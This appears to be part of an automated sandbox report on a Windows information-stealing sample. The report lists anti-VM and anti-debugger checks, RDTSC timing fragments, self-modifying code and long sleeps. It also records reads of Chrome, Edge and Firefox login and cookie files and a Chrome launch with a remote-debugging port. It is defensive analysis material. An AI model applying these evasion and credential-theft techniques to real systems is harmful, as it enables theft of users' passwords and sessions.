Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7570080 second address: 7570085 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7570085 second address: 757009D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, si 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC69CFD56EBh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7530AA8 second address: 7530AAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7530AAE second address: 7530AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7530AB2 second address: 7530AE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, 3297h 0x00000011 pushfd 0x00000012 jmp 00007FC69D5338FCh 0x00000017 add esi, 63429A08h 0x0000001d jmp 00007FC69D5338FBh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F0036 second address: 74F003C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F003C second address: 74F005B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533904h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F005B second address: 74F005F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F005F second address: 74F0065 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F0065 second address: 74F009C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC69CFD56F2h 0x00000009 adc ax, 6B08h 0x0000000e jmp 00007FC69CFD56EBh 0x00000013 popfd 0x00000014 mov ecx, 41BFAD7Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F009C second address: 74F00A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F00A0 second address: 74F00A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F00A4 second address: 74F00AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F0759 second address: 74F075F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F075F second address: 74F0763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F0763 second address: 74F0767 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F0767 second address: 74F07F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FC69D533906h 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 call 00007FC69D5338FEh 0x00000017 mov dx, si 0x0000001a pop eax 0x0000001b pushfd 0x0000001c jmp 00007FC69D533907h 0x00000021 or eax, 2EAE3B3Eh 0x00000027 jmp 00007FC69D533909h 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 jmp 00007FC69D5338FEh 0x00000035 pop ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FC69D5338FAh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74F07F4 second address: 74F0803 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 752000A second address: 752002B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ch, 22h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC69D533902h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 752002B second address: 752002F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 752002F second address: 7520035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7520035 second address: 7520046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CFD56EDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7520046 second address: 7520086 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007FC69D533909h 0x00000014 and eax, 0BF9BD46h 0x0000001a jmp 00007FC69D533901h 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7520086 second address: 75200E5 instructions: 0x00000000 rdtsc 0x00000002 mov edx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov si, B893h 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e call 00007FC69CFD56F4h 0x00000013 movzx eax, dx 0x00000016 pop edx 0x00000017 mov edx, esi 0x00000019 popad 0x0000001a and esp, FFFFFFF0h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FC69CFD56EBh 0x00000026 or esi, 492629DEh 0x0000002c jmp 00007FC69CFD56F9h 0x00000031 popfd 0x00000032 movzx ecx, dx 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75200E5 second address: 7520119 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D5338FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 44h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edx, 32A213F0h 0x00000014 call 00007FC69D533909h 0x00000019 pop esi 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7520119 second address: 752011F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 752011F second address: 7520123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7520123 second address: 75201B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC69CFD56F2h 0x00000010 sbb si, 2698h 0x00000015 jmp 00007FC69CFD56EBh 0x0000001a popfd 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e pushfd 0x0000001f jmp 00007FC69CFD56F4h 0x00000024 and cx, D0F8h 0x00000029 jmp 00007FC69CFD56EBh 0x0000002e popfd 0x0000002f popad 0x00000030 popad 0x00000031 push eax 0x00000032 jmp 00007FC69CFD56F9h 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FC69CFD56F8h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75201B3 second address: 75201B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75201B9 second address: 75201BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75201BF second address: 75201C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75201C3 second address: 752023A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FC69CFD56F0h 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007FC69CFD56F1h 0x00000018 mov ch, 3Eh 0x0000001a popad 0x0000001b xchg eax, esi 0x0000001c jmp 00007FC69CFD56F3h 0x00000021 xchg eax, edi 0x00000022 jmp 00007FC69CFD56F6h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 752023A second address: 7520240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7520240 second address: 7520297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FC69CFD56F6h 0x0000000f mov edi, dword ptr [ebp+08h] 0x00000012 pushad 0x00000013 mov eax, 1575902Dh 0x00000018 mov esi, 4CC80229h 0x0000001d popad 0x0000001e mov dword ptr [esp+24h], 00000000h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jmp 00007FC69CFD56F1h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7520297 second address: 752029C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 752029C second address: 75202A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75202A2 second address: 75202A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75202A6 second address: 75202B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lock bts dword ptr [edi], 00000000h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov ax, dx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75202B9 second address: 75202BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7530B1C second address: 7530B2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1674DBD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 1674CF6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 18107F0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 18103C7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 18A37A7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1045 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1465 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1042 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1043 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1449 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1036 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1459 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 2176 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 7823 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.1 %
Source: C:\Users\user\Desktop\file.exe TID: 6276 Thread sleep count: 1045 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6276 Thread sleep time: -2091045s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6444 Thread sleep count: 1465 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6444 Thread sleep time: -2931465s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6220 Thread sleep count: 1042 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6220 Thread sleep time: -2085042s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6240 Thread sleep count: 1043 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6240 Thread sleep time: -2087043s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6416 Thread sleep count: 1449 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6416 Thread sleep time: -2899449s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6472 Thread sleep count: 1036 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6472 Thread sleep time: -2073036s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6420 Thread sleep count: 1459 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6420 Thread sleep time: -2919459s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6444 Thread sleep count: 205 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6444 Thread sleep time: -410205s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8004 Thread sleep count: 2176 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8004 Thread sleep time: -217600s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8004 Thread sleep count: 7823 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 8004 Thread sleep time: -782300s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000004.00000002.2005967665.00000173558EB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe Binary or memory string: T8HgFs
Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_009F8230 LoadLibraryA,GetProcAddress,FreeLibrary,PathCchRemoveExtension,GetLastError, 8_2_009F8230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_009F116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 8_2_009F116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_009F11A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_009F11A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_009F1160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 8_2_009F1160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_009F13C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 8_2_009F13C9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1684D0 cpuid 8_2_6C1684D0
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Source: Yara match File source: 8.2.service123.exe.6c0e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 8000, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior

Remote Access Functionality

barindex
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs